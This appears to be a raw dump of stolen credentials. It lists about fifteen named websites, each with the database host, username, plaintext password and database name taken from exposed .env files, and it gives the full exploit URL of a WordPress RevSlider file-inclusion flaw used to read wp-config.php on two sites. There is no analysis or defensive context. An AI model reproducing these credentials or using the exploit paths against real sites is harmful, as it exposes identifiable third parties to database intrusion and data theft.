Open the first Link To see more info
http://watpho.com/.env
 Host:  127.0.0.1
 user:  homestead
 pass:  secret
 DB:    homestead
---------------------
Full Config Path  : http://ctgroup.ro/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 Host:  localhost
 user:  ctgrou16_wp
 pass:  ct_12354
 DB:    ctgrou16_wp
---------------------
www.startupacademy.hu/.env
 Host:  127.0.0.1
 user:  startupa_admin
 pass:  sW1CU1NA
 DB:    startupa_newsletter
---------------------
www.softocraft.com/.env
 Host:  127.0.0.1
 user:  root
 pass:  
 DB:    blog
---------------------
www.firstclassschool.com/.env
 Host:  localhost
 user:  mkrtmfcp_admin
 pass:  Apostolic0016@
 DB:    mkrtmfcp_firstclass
---------------------
afitec.net/.env
 Host:  mysql.afitec.net
 user:  afitec
 pass:  nescau9523
 DB:    afitec
---------------------
hoatuanhotel.com/.env
 Host:  localhost
 user:  hoatuanh_main
 pass:  Nhunguyen@123
 DB:    hoatuanh_main
---------------------
www.roadlineco.com/.env
 Host:  panadoranet2.ipagemysql.com
 user:  roadlineco
 pass:  roadlineco@19
 DB:    roadlineco
---------------------
www.vvmanagement.com/.env
 Host:  127.0.0.1
 user:  vvmanage_admin1
 pass:  test1234!@#$
 DB:    vvmanage_pe-group
---------------------
pegroupholding.com/.env
 Host:  localhost
 user:  admin_vipnetvn
 pass:  ccn1@3$5^
 DB:    admin_vipnetvn
---------------------
www.schiltronclothing.com/.env
 Host:  mysql006.phy.heteml.lan
 user:  _papa
 pass:  papa0508
 DB:    _papa
---------------------
 Host:  localhost
 user:  schoncom_root
 pass:  Theschon.in123
 DB:    schoncom_schon
---------------------
 Host:  127.0.0.1
 user:  mdspbdor_newuser
 pass:  5(xhDiV%!97=
 DB:    mdspbdor_newsite
---------------------
Full Config Path  : http://www.carleycorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 Host:  localhost
 user:  wordpress
 pass:  5460ecd4f2579cfd7e0e83599c578a27
 DB:    wordpress
---------------------
vipnet.vn/.env
papa2.jp/.env
